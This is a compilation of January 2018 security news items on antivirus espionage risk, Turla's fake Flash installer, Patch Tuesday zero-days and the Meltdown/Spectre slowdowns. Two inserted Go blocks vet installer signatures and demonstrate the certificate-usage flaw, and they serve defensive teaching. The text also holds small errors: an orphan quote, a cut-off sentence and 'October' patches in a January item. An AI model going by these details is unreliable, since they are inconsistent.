“Although there is no known occurrence of Bitcoin theft occurring because of this vulnerability, the risk increases substantially now that the vulnerability has been made public.”


How Antivirus Software Can be the Perfect Spying Tool
10.1.2018 securityweek
Virus
Your antivirus product could be spying on you without you having a clue. It might be intentional but legitimate behavior, yet (malicious) intent is the one step separating antivirus software from a cyber-espionage tool. A perfect one, experts argue.

Because we trust the antivirus to keep us safe from malware, we let it look at all of our files, no questions asked. Whether they are personal files or work documents, the antivirus has access to them all, which is what allows it to do its job.

We do expect a security product to work in this manner, as most of them have been designed to scan all files on the system to detect any possible threats, and we accept this behavior as being part of our computer’s protection mechanism.

What if the very same features that are meant to protect us from threats become the threats themselves? Would it be possible for an antivirus application to be used as a spying tool, to flag documents of interest and exfiltrate them instead of keeping our files safe? The answer appears to be “Yes!”

"In order for AV to work correctly, it has to be plumbed into the system in such a way that it can basically see and control anything the system can do. Memory allocation, disk reads and writes, communication, etc... This means that it is essentially in the middle of all transactions within the OS. Therefore, it makes a pretty good candidate for take over and compromise,” Jason Kent, CTO at AsTech, told SecurityWeek via email.

In some cases, the data exfiltration, which is legitimate behavior, could result in unintended leakage, as would be the case with security programs that upload binaries to cloud-based multiscanners like Google’s VirusTotal. In an attempt to better assess whether files are malicious or not, these security tools end up leaking data if the analyzed files are accessible to the multiscanner’s subscribers.

But what if your antivirus was intentionally turned into a tool that could spy on you? Would that be possible without modifying the program itself? According to security researcher Patrick Wardle, it is possible.

To prove this, and using the "Antivirus Hacker's Handbook" (Joxean Koret) as a basis for an experiment, he tampered with the virus signatures of Kaspersky Lab’s Internet Security for macOS and modified one of the signatures to automatically detect classified documents and mark them for collection. By modifying signatures instead of the antivirus engine, he didn’t alter the security application’s main purpose.

Wardle conducted his experiment on a Kaspersky product for an obvious reason: last year, reports suggested that the Russian-based security company’s software had been used to steal classified documents from a National Security Agency (NSA) contractor’s computer. The contractor took home sensitive data, including NSA exploits, and was apparently targeted by hackers after a Kaspersky product on his home computer flagged the files as malicious and sent them to the company’s server for further analysis.

In December 2017, the NSA contractor, Vietnam-born Nghia Hoang Pho, agreed to plead guilty to removing and retaining top-secret documents from the agency. Last week, another NSA contractor agreed to plead guilty after being accused of hoarding around 50 terabytes of NSA data and documents in his home and car over a 20-year period.

In September 2017, the United States Department of Homeland Security (DHS) ordered government departments and agencies to stop using Kaspersky products due to concerns regarding the company’s ties to Russian intelligence. Last month, Lithuania said it would ban Kaspersky Lab's products from computers managing key energy, finance and transport systems due to security concerns.

The anti-virus maker has continually denied any connections to the Russian government and even launched a new transparency initiative to clear its name. In December, the company sued the U.S. government over the product ban.

So far, no evidence has been presented that shows any inappropriate connections between Kaspersky Lab and the Russian government.

In a technical analysis published last year, Kaspersky suggested the report might be referring to a 2014 incident where its antivirus worked as intended by flagging what appeared to be suspected Equation malware source code on a personal computer. The company said it had deleted the files from its servers but couldn’t confirm the NSA contractor was involved in the incident.

What Wardle decided to do was to find out whether the Moscow-based security company’s products can indeed be used to flag and exfiltrate classified documents. He successfully managed to modify a signature for his security product, despite the complex process Kaspersky employs for updating and deploying virus signatures onto the users’ computers.

And while he made the modifications locally, his experiment demonstrated that it is indeed possible to abuse anti-virus programs to spy on users. By modifying their signatures, antivirus programs can become “the absolute perfect cyber-espionage collection” tools. And this isn’t true only of Kaspersky’s products.

“Of course if an anti-virus company wanted to (or was forced to) they'd simply deploy a new signature likely to select clients (targets), in order to persistently detect such documents […]. I am confident without a doubt that any anti-virus product with collection capabilities could arbitrarily collect (exfiltrate) files flagged by their product,” Wardle noted.

The file collection capability is, of course, designed to support legitimate functionality of the product. Thus, for an antivirus product to become a spying tool, it would have to have an actor with malicious intent behind it.

“A malicious or willing insider within any anti-virus company, who could tactically deploy such a signature, would likely remain undetected. And of course, in a hypothetical scenario; any anti-virus company that is coerced to, or is willing to work with a larger entity (such as a government) would equally be able to stealthily leverage their product to detect and exfiltrate any files of interest,” Wardle concluded.

The researcher’s findings aren’t surprising and Kaspersky themselves said last week that “any malicious actor who gains administrative access to a computer could theoretically engage in file searching activity on the computer or subvert almost any application running on it (which is the type of activity that Kaspersky Lab products are designed to detect and prevent).”

SecurityWeek contacted Kaspersky for comment, but they redirected us to last week’s statement, saying that that is their official position.

Security experts contacted by SecurityWeek for perspective agree that antivirus products could potentially be used for nefarious purposes, if a malicious actor was involved. While the general consensus is that users wouldn’t even know if their antivirus was spying on them, it doesn’t mean that antivirus companies engage in such practices. Only that it would be possible to use their products in such a manner.

“AV vendors must be very careful to ensure they are never compromised. Imagine if I could control all of the AV installations at an enterprise. It would be possible to make all of those machines participate in a botnet or use the AV system to load additional code, such as Ransomware. This is conceptually possible as the engine and signatures are designed to be changed via an update process. Compromise there would be a very interesting thing for sure,” Kent told us.

Chris Morales, head of security analytics at San Jose, California-based Vectra Networks, agrees that antivirus products could be manipulated to find and exfiltrate sensitive documents. He also agrees that this could be the act of a malicious or willing insider at any antivirus company.

“AV vendors, as do many security vendors who perform malware scanning on the network and endpoint, have administrative level access to systems to scan files for malicious code. This scanning engine could be manipulated to look for sensitive documents and then upload them to the cloud analysis engine. This would most likely be someone at the vendor with malicious intent,” Morales told SecurityWeek in an emailed comment.

“Security vendors who perform cloud based analysis have to walk a very thin line and it is important that these vendors implement the proper controls to ensure they do not create the security hole for customers. I would say most vendors do a very good job of ensuring their processes are secure and would not cause a problem for the client. This does mean there is a level of trust in security vendors that clients need to validate and should be asking for a description of how their detection processes work,” Morales continued.

Chris Roberts, chief security architect at Santa Clara, Calif.-based threat protection firm, told SecurityWeek that it is a known fact that “Kaspersky is not the only tool that’s built into enterprises to be used against themselves for the fortunes of malicious intent.” Over the past couple of years, several endpoint detection tools have been revealed to have issues identifying problems and to include management techniques that can be turned against enterprises.

“So, yes, Kaspersky software can be used against the intended targets, we have established that. The mechanism is there, however, the INTENT is the issue. The analysis into IS it being used against organizations is the factor that is obviously in dispute. Late last year, the UK took the step to warn all agencies against deploying Kaspersky. The US has already taken that step, but in all honesty, IF we were to look at the plethora of endpoint detection/manipulation/management tools out there, we’d better remove 50% of them for the same insecurities and inabilities to protect the very end-users we’re trying to save,” Roberts says.

He also points out that most security software out there requires access to everything stored on a computer, not only one single product. “The others all being carefully kept out of the news in the hope we don’t all suddenly wake up and realize that everything designed to keep us safe is also designed to access our darkest secrets… and scour them for whatever we hope it’s meant to be finding… or what it WANTS to find,” Roberts continued.

Of course, there’s no proof that an antivirus program has been used for malicious intent, although it is clear that they could be used in such a manner. As Wardle puts it: “Please avoid jumping to the conclusion that this [is] something Kaspersky, or any other anti-virus company actually did!”

Kaspersky Lab has continually denied any inappropriate ties to the Russian intelligence services; and there is no public evidence to suggest otherwise. Unfortunately for the Moscow-based security company, this is a result of the effect of geopolitics on cybersecurity.


Turla APT group’s espionage campaigns now employ Adobe Flash Installer and ingenious social engineering
10.1.2018 securityaffairs APT

Turla APT group’s espionage campaigns now employ an Adobe Flash installer and an ingenious social engineering technique: the backdoor is downloaded from what appear to be legitimate Adobe URLs and IP addresses.
Security researchers from ESET, who have analyzed recent cyber espionage campaigns conducted by the dreaded Turla APT group, reported that the hackers use malware downloaded from what appear to be legitimate Adobe URLs and IP addresses.

Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.

The list of victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

The Turla arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using

In the most recent attacks, the group packages its macOS backdoor with a real Adobe Flash installer and downloads the malware onto victim systems from a remote IP address belonging to Akamai, the Content Delivery Network that Adobe also uses to distribute its software. Legitimate Flash installers are, in fact, also distributed through the Akamai network.

“In recent months, we have observed a strange, new behavior, leading to compromise by one of Turla’s backdoors. Not only is it packaged with the real Flash installer, but it also appears to be downloaded from adobe.com.” reads the report published by ESET.

“From the endpoint’s perspective, the remote IP address belongs to Akamai, the official Content Delivery Network (CDN) used by Adobe to distribute their legitimate Flash installer.”

Researchers noted that Turla installers had been exfiltrating information to get.adobe.com URLs since at least July 2016; the data were sent to legitimate URLs at adobe.com. The download attempts observed by ESET were made over HTTP rather than HTTPS, and the researchers state with confidence that Adobe itself was not compromised.

The social engineering technique adopted by the Turla group to trick victims into believing they are downloading legitimate software from an Adobe server is very ingenious.

Data collected by the experts revealed that most of the victims belong to the former USSR, targeted entities include embassies and consulates located in East Europe.

At the time of the report, it is still unclear how the Turla APT group distributed the backdoor through adobe.com.

Experts speculate that this is possible by compromising a machine on the victim’s network to perform a local man-in-the-middle attack. In this scenario, the threat actors redirect traffic from a target system through the compromised machine and modify it on the fly. Another possibility is a compromised local gateway, which could allow the attackers to intercept and modify traffic for the whole organization.

Other attack scenarios see Turla executing a man-in-the-middle attack at the ISP level, or BGP hijacking.

“We quickly discarded the hypothesis of a rogue DNS server, since the IP address corresponds to the servers used by Adobe to distribute Flash.” continues the report. “Thus, these are the hypotheses that remain: ➊ a Man-in-the-Middle (MitM) attack from an already-compromised machine in the local network, ➋ a compromised gateway or proxy of the organization, ➌ a MitM attack at the Internet Service Provider (ISP) level or ➍ a Border Gateway Protocol (BGP) hijack to redirect the traffic to Turla-controlled servers.”


Researchers believe the most likely scenario is that the attackers control a router and use it to hijack the traffic.

Such an attack is possible at all only because the files are downloaded via HTTP; for this reason, it is important to avoid installing any update or software that was downloaded over an unsecured connection.

Administrators must also check that downloaded Flash Player installers are properly signed with a valid Adobe certificate.
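A defender-side version of the two checks just described (refuse installers fetched over plaintext HTTP, and require the installer bundle's signature chain to match the vendor identity recorded from a known-good copy), added here as example Go code that is not part of the ESET report or of any Adobe tooling. It parses the output of `codesign -dvv` on the installer .app inside the DMG; the signer string, team identifier, URL paths and the sample codesign output are constructed placeholders that an administrator would replace with values read from a known-good installer.

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"strings"
)

// SigningPolicy is the signer identity an administrator expects, read once from a
// known-good installer. The values are constructed placeholders, not Adobe's real ones.
type SigningPolicy struct {
	LeafAuthority  string // first "Authority=" line printed by codesign
	TeamIdentifier string // "TeamIdentifier=" line printed by codesign
}

var Policy = SigningPolicy{
	LeafAuthority:  "Developer ID Application: Example Vendor (PLACEHOLDER1)",
	TeamIdentifier: "PLACEHOLDER1",
}

// CodesignInfo is the part of `codesign -dvv <bundle> 2>&1` output we act on.
type CodesignInfo struct {
	TeamIdentifier string
	Authorities    []string // leaf first, root last, in the order printed
}

// ParseCodesign extracts the TeamIdentifier and the Authority chain.
func ParseCodesign(out string) CodesignInfo {
	var info CodesignInfo
	sc := bufio.NewScanner(strings.NewReader(out))
	for sc.Scan() {
		parts := strings.SplitN(strings.TrimSpace(sc.Text()), "=", 2)
		if len(parts) != 2 {
			continue // e.g. "code object is not signed at all"
		}
		switch parts[0] {
		case "TeamIdentifier":
			info.TeamIdentifier = parts[1]
		case "Authority":
			info.Authorities = append(info.Authorities, parts[1])
		}
	}
	return info
}

// CheckDownloadURL flags an installer fetched over anything but HTTPS; the plaintext
// download is what makes the MitM, gateway, ISP and BGP-hijack scenarios possible.
func CheckDownloadURL(raw string) []string {
	u, err := url.Parse(raw)
	if err != nil {
		return []string{"unparseable download URL: " + err.Error()}
	}
	if u.Scheme != "https" {
		return []string{fmt.Sprintf("installer fetched over %q instead of https", u.Scheme)}
	}
	return nil
}

// CheckSignature requires the expected signer and team and a chain ending in Apple Root CA.
func CheckSignature(info CodesignInfo, p SigningPolicy) []string {
	if len(info.Authorities) == 0 || info.Authorities[0] == "(unavailable)" {
		return []string{"bundle is unsigned or ad-hoc signed (no Authority chain)"}
	}
	var findings []string
	if info.Authorities[0] != p.LeafAuthority {
		findings = append(findings, fmt.Sprintf("unexpected signer %q", info.Authorities[0]))
	}
	if root := info.Authorities[len(info.Authorities)-1]; root != "Apple Root CA" {
		findings = append(findings, fmt.Sprintf("chain ends in %q, not Apple Root CA", root))
	}
	if info.TeamIdentifier != p.TeamIdentifier {
		findings = append(findings, fmt.Sprintf("TeamIdentifier %q, expected %q",
			info.TeamIdentifier, p.TeamIdentifier))
	}
	return findings
}

// VetInstaller runs both checks; an empty result means the installer passed.
func VetInstaller(downloadURL, codesignOut string, p SigningPolicy) []string {
	return append(CheckDownloadURL(downloadURL), CheckSignature(ParseCodesign(codesignOut), p)...)
}

// Constructed samples: a clean download, and one with the traits ESET describes.
const (
	GoodURL      = "https://downloads.example.invalid/Install.dmg"
	BadURL       = "http://get.adobe.com/flashplayer/Install.dmg" // path is constructed
	GoodCodesign = "Authority=Developer ID Application: Example Vendor (PLACEHOLDER1)\n" +
		"Authority=Developer ID Certification Authority\nAuthority=Apple Root CA\n" +
		"TeamIdentifier=PLACEHOLDER1\n"
	BadCodesign = "Authority=Developer ID Application: Someone Else (PLACEHOLDER2)\n" +
		"Authority=Developer ID Certification Authority\nAuthority=Apple Root CA\n" +
		"TeamIdentifier=PLACEHOLDER2\n"
)

func main() {
	fmt.Println("bad sample:  ", VetInstaller(BadURL, BadCodesign, Policy))
	fmt.Println("clean sample:", VetInstaller(GoodURL, GoodCodesign, Policy))
}
```

On a real host, feed the function the URL the installer was actually fetched from and the captured `codesign -dvv "/Volumes/<dmg>/<Installer>.app" 2>&1` output; codesign writes these lines to stderr.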

Further information, including IoCs, is available in the report published by ESET.


January 2018 Patch Tuesday security updates fix a zero-day vulnerability in MS Office
10.1.2018 securityaffairs
Vulnerability

Microsoft has released the January 2018 Patch Tuesday security updates, containing fixes for 56 vulnerabilities including the zero-day vulnerability CVE-2018-0802 in MS Office.
Sixteen of the security updates are rated critical, 38 important, one moderate, and one low in severity. The updates fix security vulnerabilities in Windows, Office, Internet Explorer, ChakraCore, Edge, ASP.NET, and the .NET Framework.

The January 2018 Patch Tuesday also includes three special security advisories that address flaws related to Adobe Flash and the Meltdown and Spectre vulnerabilities, plus an update for the Office suite.

The zero-day vulnerability is a memory corruption flaw in Office tracked as CVE-2018-0802; in the past few months it has been actively exploited by multiple attackers in the wild. The vulnerability can be exploited for remote code execution by tricking the victim into opening a specially crafted malicious Word file in MS Office or WordPad.

The flaw was discovered by several experts from Tencent, Qihoo 360, ACROS Security’s 0Patch Team, and Check Point Software Technologies.

Security firm Check Point has published a detailed analysis of the flaw in a blog post including a video PoC of its exploitation.

The flaw is related to the memory-corruption issue CVE-2017-11882, which affects all versions of Microsoft Office released in the past 17 years; it resides in the Equation Editor component (EQNEDT32.EXE) and was addressed by Microsoft in November.

The analysis of CVE-2017-11882 allowed the researchers at 0Patch to discover CVE-2018-0802, which is fixed in the January 2018 Patch Tuesday.

Microsoft also addressed nine remote code execution and memory disclosure vulnerabilities in MS Office.

Microsoft also addressed an X.509 certificate validation bypass vulnerability, tracked as CVE-2018-0786, in the .NET Framework (and .NET Core) that could be exploited by threat actors to have their invalid certificates accepted as valid.

“Microsoft is aware of a security vulnerability in the public versions of .NET Core where an attacker could present a certificate that is marked invalid for a specific use, but a component uses it for that purpose. This action disregards the Enhanced Key Usage tagging.” states Microsoft.
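What the Enhanced Key Usage check is meant to enforce, shown as an added Go example (not Microsoft's code and not the .NET implementation): a constructed test CA issues a leaf certificate whose only declared purpose is clientAuth, and the same chain is verified once with serverAuth required and once with any purpose accepted, which is the disregard of EKU the advisory describes.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// Result: whether the leaf was accepted, and if not whether the cause was an EKU mismatch.
type Result struct {
	Accepted        bool
	IncompatibleUse bool
	Reason          string
}

// selfSignedCA builds a throwaway root for the demonstration (constructed, not a real trust anchor).
func selfSignedCA() (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "Constructed Test Root"},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// issueLeaf issues a certificate for host whose Extended Key Usage extension lists exactly ekus.
func issueLeaf(ca *x509.Certificate, caKey *ecdsa.PrivateKey, host string, ekus []x509.ExtKeyUsage) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(2),
		Subject:      pkix.Name{CommonName: host},
		DNSNames:     []string{host},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  ekus,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, ca, &key.PublicKey, caKey)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// VerifyForPurpose issues a leaf carrying leafEKUs and verifies its chain for one purpose.
// Passing x509.ExtKeyUsageAny models the flaw: the chain is validated, but the declared uses are ignored.
func VerifyForPurpose(leafEKUs []x509.ExtKeyUsage, purpose x509.ExtKeyUsage) (Result, error) {
	ca, caKey, err := selfSignedCA()
	if err != nil {
		return Result{}, err
	}
	const host = "service.example.invalid"
	leaf, err := issueLeaf(ca, caKey, host, leafEKUs)
	if err != nil {
		return Result{}, err
	}
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	_, verr := leaf.Verify(x509.VerifyOptions{
		Roots:     roots,
		DNSName:   host,
		KeyUsages: []x509.ExtKeyUsage{purpose},
	})
	if verr == nil {
		return Result{Accepted: true}, nil
	}
	var cie x509.CertificateInvalidError
	ekuMismatch := errors.As(verr, &cie) && cie.Reason == x509.IncompatibleUsage
	return Result{IncompatibleUse: ekuMismatch, Reason: verr.Error()}, nil
}

func main() {
	clientOnly := []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}
	strict, _ := VerifyForPurpose(clientOnly, x509.ExtKeyUsageServerAuth)
	lax, _ := VerifyForPurpose(clientOnly, x509.ExtKeyUsageAny)
	fmt.Printf("strict accepted=%v (%s); lax accepted=%v\n", strict.Accepted, strict.Reason, lax.Accepted)
}
```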

The January 2018 Patch Tuesday also addresses a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer; the flaws could be exploited by a remote attacker for code execution by tricking the victim into opening a specially crafted webpage that triggers a memory corruption error.

Finally, Microsoft also patched a flaw in Outlook for Mac (CVE-2018-0819, aka Mailsploit attack) that could be exploited by attackers to send emails with spoofed identities.


Microsoft, Intel Share Data on Performance Impact of CPU Flaw Patches
10.1.2018 securityweek
Vulnerability
Microsoft and Intel have shared more information on the performance impact of the patches released for the recently disclosed attack methods known as Spectre and Meltdown.

The Spectre and Meltdown exploits work on systems using CPUs from Intel, AMD and ARM, and they allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information. Patches and workarounds have been released by both hardware and software vendors, but they may introduce significant performance penalties.

Intel has insisted that average computer users – owners of typical home and business PCs – should not see any significant impact on performance during common tasks, such as reading emails, viewing photos or writing documents. Benchmark tests conducted by the company using SYSmark 2014 showed an impact of 6 percent or less for 8th Generation Core platforms with solid state storage.

All but two of the currently supported Intel processors are said to be affected by the Spectre and Meltdown vulnerabilities. However, a technology called PCID (Process-Context Identifiers), which is present in newer processors, should lessen the impact on performance.

Intel says it has yet to “build a complete picture of the impact on data center systems,” but points to statements from major vendors who have conducted tests.

Shortly after applying the Meltdown and Spectre patches to its Azure cloud platform, Microsoft said it had not seen any noticeable performance impact. The company noted that some users may experience networking performance impact, but that can be addressed using the Azure Accelerated Networking feature.

After conducting more tests, Microsoft pointed out that mitigations for Meltdown (CVE-2017-5754) and one of the Spectre flaws (CVE-2017-5753) have minimal performance impact, but the remediation for the second Spectre vulnerability (CVE-2017-5715) does introduce more significant performance penalties.

Specifically, Microsoft found that users running Windows 10 on newer chips (2016-era PCs with Skylake, Kabylake or newer CPUs) should not notice any slowdowns. While there are some single-digit performance penalties, they are reflected in milliseconds.

On the other hand, when running Windows 10, Windows 8 or Windows 7 on devices with older chips (2015-era PCs with Haswell or older CPUs), benchmark tests showed more significant penalties and users may actually notice a decrease in performance. On Windows 10, only some users should experience slowdowns, but on older versions of the operating system most users are expected to notice performance issues.

In the case of Windows Server, regardless of what type of chip is used, a more significant performance impact is expected after mitigations are applied, particularly in the case of IO-intensive applications. In the case of Windows Server, Microsoft has actually advised users to evaluate the risk of untrusted code running on their machines and “balance the security versus performance tradeoff” for their specific environment.

“For context, on newer CPUs such as on Skylake and beyond, Intel has refined the instructions used to disable branch speculation to be more specific to indirect branches, reducing the overall performance penalty of the Spectre mitigation. Older versions of Windows have a larger performance impact because Windows 7 and Windows 8 have more user-kernel transitions because of legacy design decisions, such as all font rendering taking place in the kernel,” Microsoft explained.

Red Hat has also reported seeing measurable performance impact, ranging between 8 and 19 percent, for operations involving highly cached random memory.

Amazon said it had not observed any significant performance impact for the overwhelming majority of EC2 workloads, but some AWS customers have complained about degraded performance after the patches were applied starting in December.

Apple, which started performing tests after releasing updates in December, also said it had not seen any measurable reduction in the performance of macOS and iOS. Google also claimed to have observed negligible impact on performance after applying mitigations to its own systems.

Epic Games informed users recently that the CPU usage of its backend cloud services increased significantly after Meltdown mitigations were applied, which led to login issues and service instability.


Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day
10.1.2018 thehackernews 
Vulnerability
If you think that the CPU updates addressing this year's major security flaws, Meltdown and Spectre, are the only ones you are advised to grab immediately, there are a handful of other major security flaws that you should pay attention to.
Microsoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office that had been actively exploited by several threat groups in the wild.
Sixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework.
The zero-day vulnerability (CVE-2018-0802), described by Microsoft as a memory corruption flaw in Office, is already being targeted in the wild by several threat actor groups in the past few months.
The vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad.
According to the company, this security flaw is related to CVE-2017-11882—a 17-year-old vulnerability in the Equation Editor functionality (EQNEDT32.EXE), which Microsoft addressed in November.
When researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a blog post published by Check Point.
Besides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office.
A spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for Mac, which has been listed as publicly disclosed (Mailsploit attack), has also been addressed by the company. The vulnerability causes some versions of Outlook for Mac not to handle the encoding and display of email addresses properly, so that antivirus or anti-spam scanning does not work as intended.
Microsoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to show their invalid certificates as valid.
"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose," describes Microsoft. "This action disregards the Enhanced Key Usage taggings."
The company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer.
All these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially-crafted webpage that triggers a memory corruption error, though none of these has been exploited in the wild yet.
Meanwhile, Adobe has patched a single out-of-bounds read flaw (CVE-2018-4871) this month that could allow for information disclosure, though no active exploits have been seen in the wild.
Users are strongly advised to apply October security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.
For installing security updates, simply head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


Microsoft Patches Zero-Day Vulnerability in Office
10.1.2018 securityweek
Vulnerability
Microsoft’s January 2018 Patch Tuesday updates address more than 50 vulnerabilities, including a zero-day vulnerability in Office related to an Equation Editor flaw that has been exploited by several threat groups in the past few months.

The zero-day vulnerability, tracked as CVE-2018-0802, has been described by Microsoft as a memory corruption issue that can be exploited for remote code execution by getting targeted users to open a specially crafted file via Office or WordPad.

Microsoft has credited several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security’s 0Patch Team, and experts from Check Point Software Technologies for finding the flaw.

The security hole is related to CVE-2017-11882, a 17-year-old vulnerability in the Equation Editor (EQNEDT32.EXE), which the vendor addressed with the November 2017 Patch Tuesday updates. Based on how the patch was developed, experts believe Microsoft may have lost the application’s source code, which forced it to somehow patch the executable file directly.

Microsoft replaced the Equation Editor component in Office 2007, but kept the old one as well for compatibility reasons. The problematic component has now been removed from Office.

0Patch researchers have been analyzing CVE-2017-11882, which likely led them to discover a new, related vulnerability. Check Point has published a blog post with the details of CVE-2018-0802 and showed how an exploit works, but they have not mentioned any attacks.

This suggests that the Chinese researchers may have been the ones who spotted the vulnerability being exploited in attacks. This would not be the first time experts at Qihoo 360 witnessed the exploitation of an Office zero-day. Back in October, after Microsoft released a patch, they reported seeing CVE-2017-11826 being leveraged to deliver malware.

If CVE-2018-0802 is related to CVE-2017-11882, there is a long list of threat actors who may be exploiting it. CVE-2017-11882 has been exploited by Iranian cyberspies, the Cobalt hacking group, someone who uses TelegramRAT, and likely others.

Microsoft’s Patch Tuesday updates also address a spoofing vulnerability in Office for Mac that has already been publicly disclosed. Sixteen of the flaws resolved this month have been rated critical, a majority affecting the scripting engine used by the Edge and Internet Explorer web browsers.

Microsoft has also rated critical a Word vulnerability (CVE-2018-0797) that can be exploited for remote code execution using specially crafted RTF files.

Adobe’s Patch Tuesday updates for this month patch only one information disclosure vulnerability in Flash Player.


VirusTotal announced the availability of a visualization tool, dubbed VirusTotal Graph, designed to help with malware analysis.

10.1.2018 securityweek Virus
VirusTotal Graph should allow investigators who work with multiple reports at the same time to pivot between multiple data points (files, URLs, domains and IP addresses). Observing the connections across different malware samples could allow investigators to correlate events from different cases.

“VirusTotal receives a large number of files and URLs every day, and each of them is analyzed by AVs and other tools and sandboxes to extract information about them. This information is critical for our ecosystem, as it connects the dots and makes clear the connections between entities.” states VirusTotal.

“It is common to pivot over many data points (files, URLs, domains and IP addresses) to get the full picture of your investigation, and this usually involves looking at multiple reports at the same time. We know this can be complicated when you have many open tabs, therefore, we’ve developed VirusTotal Graph.”

VirusTotal Graph is built on VirusTotal’s data set and was designed to visualize, in a single graphical interface, the relationships between files, URLs, domains and IP addresses. The graph is navigable, which makes the investigation of malicious code easier for malware researchers.


Analysts can build their own network by exploring and expanding each of the nodes in the graph.

The tool includes a search box, node summary section, node expansion section that allows correlation of the information from more entities, node action menu, detection dropdown, and a node list.

VirusTotal also allows users to save the graphs they generated, as well as to share their findings with other users. All saved graphs are public and also linked in VirusTotal public reports of files, URLs, IP addresses or domains that appear in the graph.

“We feel the community will benefit from this intelligence. We understand that there are scenarios where a higher degree of privacy is needed, and we are working on a solution — expect to see some news around it soon,” VirusTotal concludes.

The complete documentation is available at https://support.virustotal.com/hc/en-us/articles/115005002585-VirusTotal-Graph. VirusTotal also published two videos that show the main features implemented in the tool.


Microsoft: Meltdown and Spectre patches could cause noticeable performance slowdowns
10.1.2018 securityaffairs
Vulnerability

Microsoft officially confirmed that Meltdown and Spectre patches could cause noticeable performance slowdowns, contrary to what was initially thought.
Just after the disclosure of the Meltdown and Spectre vulnerabilities, many security experts argued that the forthcoming patches would have a significant impact on performance (30% degradation), but Intel pointed out that average users would not notice any difference.

“Intel continues to believe that the performance impact of these updates is highly workload-dependent and, for the average computer user, should not be significant and will be mitigated over time.” continues Intel.

“While on some discrete workloads the performance impact from the software updates may initially be higher, additional post-deployment identification, testing and improvement of the software updates should mitigate that impact.”

Intel confirmed that extensive testing conducted by tech giants (Apple, Amazon, Google, and Microsoft) to assess any impact on system performance from security updates did not reveal negative effects.

Unfortunately, someone has underestimated the problem and Microsoft Windows patches for the CPU flaws will cause noticeable performance degradation, with most severe impact on Windows servers as well as Windows 7 and 8 client machines.

Microsoft published a blog post that confirmed that Windows servers will experience noticeable performance slowdowns, as will Windows 7 and 8 client machines running older processors (2015-timeframe PCs with Haswell or older CPUs).

The good news is that newer Windows 10 platforms won’t experience perceptible performance degradation.

Below are Microsoft’s findings on the performance degradation caused by the installation of the Meltdown/Spectre patches.

With Windows 10 on newer silicon (2016-era PCs with Skylake, Kabylake or newer CPU), benchmarks show single-digit slowdowns, but we don’t expect most users to notice a change because these percentages are reflected in milliseconds.
With Windows 10 on older silicon (2015-era PCs with Haswell or older CPU), some benchmarks show more significant slowdowns, and we expect that some users will notice a decrease in system performance.
With Windows 8 and Windows 7 on older silicon (2015-era PCs with Haswell or older CPU), we expect most users to notice a decrease in system performance.
Windows Server on any silicon, especially in any IO-intensive application, shows a more significant performance impact when you enable the mitigations to isolate untrusted code within a Windows Server instance. This is why you want to be careful to evaluate the risk of untrusted code for each Windows Server instance, and balance the security versus performance tradeoff for your environment.
Microsoft announced it is working to solve the problem and the situation appears critical for Windows servers.

Microsoft has patched 41 of its 45 Windows versions and is going to release the remaining four updates as soon as possible.

Microsoft said the entire industry needs to work together to find the best possible solutions for customers affected by vulnerabilities like Spectre and Meltdown.


WPA3 to Bring Improved Wireless Security in 2018
9.1.2018 securityweek Safety
Wi-Fi Alliance Announces WPA3, the Successor to Wi-Fi's WPA2 Security Protocol

